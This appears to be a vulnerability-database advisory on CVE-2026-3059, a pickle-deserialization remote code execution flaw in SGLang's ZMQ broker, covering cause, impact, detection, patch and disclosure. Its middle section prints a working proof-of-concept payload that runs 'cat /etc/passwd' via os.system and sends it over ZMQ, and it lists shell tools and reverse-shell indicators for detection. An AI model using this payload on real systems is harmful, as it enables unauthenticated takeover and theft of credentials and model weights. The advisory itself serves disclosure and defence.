
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3059 is an unauthenticated remote code execution vulnerability in SGLang's multimodal generation module, caused by unsafe deserialization of untrusted data via pickle.loads() in the ZMQ broker component (scheduler_client.py). It affects SGLang versions 0.5.5 through 0.5.9 (inclusive) and was discovered by Igor Stepansky of Orca Security on February 4, 2026, with coordinated disclosure through CERT/CC (case VU#665416) and public disclosure on March 12, 2026. The vulnerability carries a CVSS v3.1 base score of 9.8 (Critical) (Orca Security, CERT/CC).
The root cause is CWE-502 (Deserialization of Untrusted Data): SGLang's multimodal generation server starts a ZeroMQ (ZMQ) REP broker socket that binds to all network interfaces (tcp://*:{broker_port}) with no authentication, TLS, or source IP filtering. The broker's main loop calls pickle.loads() directly on any received bytes without any prior validation, and because Python's pickle protocol encodes arbitrary callable instructions — not just data — an attacker can craft a payload whose __reduce__ method invokes os.system() or any other callable, achieving code execution the instant pickle.loads() runs. The broker port defaults to the HTTP port plus one (e.g., port 8001 when the HTTP server is on 8000), and the vulnerable code path is activated whenever the multimodal generation feature is enabled. A functional PoC using a custom RCEPayload class with a malicious __reduce__ method has been publicly demonstrated (Orca Security, GitHub Source).
Successful exploitation grants an unauthenticated remote attacker full code execution with the privileges of the SGLang process, typically running inside containerized GPU inference infrastructure (Kubernetes pods, Docker containers, or dedicated GPU nodes). This can result in complete confidentiality, integrity, and availability compromise — including exposure of model weights, inference data, API credentials, and GPU workloads — and may provide a pivot point into the surrounding cluster environment. Default text-only SGLang deployments are not affected; only instances with the multimodal generation feature explicitly enabled and the ZMQ broker port network-reachable are vulnerable (Orca Security).
A functional proof-of-concept exploit is publicly available, requiring only a standard ZMQ REQ socket and a crafted pickle payload — a single-message exploit with no credentials, headers, or complex preconditions. No in-the-wild exploitation has been reported as of the time of publication. The EPSS score is approximately 0.0117 (1.17%), reflecting low but non-negligible exploitation probability given the public PoC and trivial weaponization effort. The vulnerability is not currently listed in the CISA KEV catalog. The SGLang maintainers did not respond to coordinated disclosure efforts prior to public release (Orca Security, CERT/CC).
__reduce__ method that returns a dangerous callable and arguments:import os, pickle
class RCEPayload:
def __init__(self, cmd):
self.cmd = cmd
def __reduce__(self):
return (os.system, (self.cmd,))
payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))import zmq
ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")
sock.send(payload)pickle.loads() on the received bytes, triggering os.system(cmd) with the attacker's command, executing in the context of the SGLang process. The ZMQ REP/REQ pattern returns a response, confirming execution (Orca Security)./bin/sh, /bin/bash, curl, wget, nc, or python; reverse shell processes originating from the SGLang service account./tmp/ or other writable directories by the SGLang process; new scripts, cron jobs, or SSH authorized keys created by the SGLang service account.execve calls from the SGLang process (Orca Security).SGLang version 0.5.10 addresses CVE-2026-3059 by binding the ZMQ broker socket to localhost (127.0.0.1) instead of all interfaces (*), preventing remote exploitation (PR #21435), and separately replaces unsafe pickle.loads() with a SafeUnpickler for the crash dump replay script (PR #20904) (SGLang v0.5.10). Users should upgrade to SGLang 0.5.10 or later immediately. If immediate patching is not possible, apply the following workarounds:
replay_request_dump.py on .pkl files from untrusted or shared directories.The vulnerability was discovered by Igor Stepansky of Orca Security and coordinated through CERT/CC (VU#665416), with CERT/CC researcher Christopher Cullen contributing a proposed patch and discovering the related CVE-2026-3989. The SGLang maintainers did not respond to coordinated disclosure efforts prior to public release, prompting CERT/CC to contact CISA for additional assistance — a notable failure in vendor response for a critical AI/ML infrastructure component (Orca Security, CERT/CC). Coverage appeared in The Hacker News, Security Online, and SAPInsider, with commentary highlighting the systemic nature of unsafe pickle deserialization across the Python AI/ML ecosystem. A SGLang collaborator noted in the patch PR that "inference services are typically deployed in data centers with private/guarded networks," suggesting the severity may be context-dependent, while the security community broadly emphasized that network-exposed AI infrastructure should not rely on deployment assumptions for security (GitHub PR #20904).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."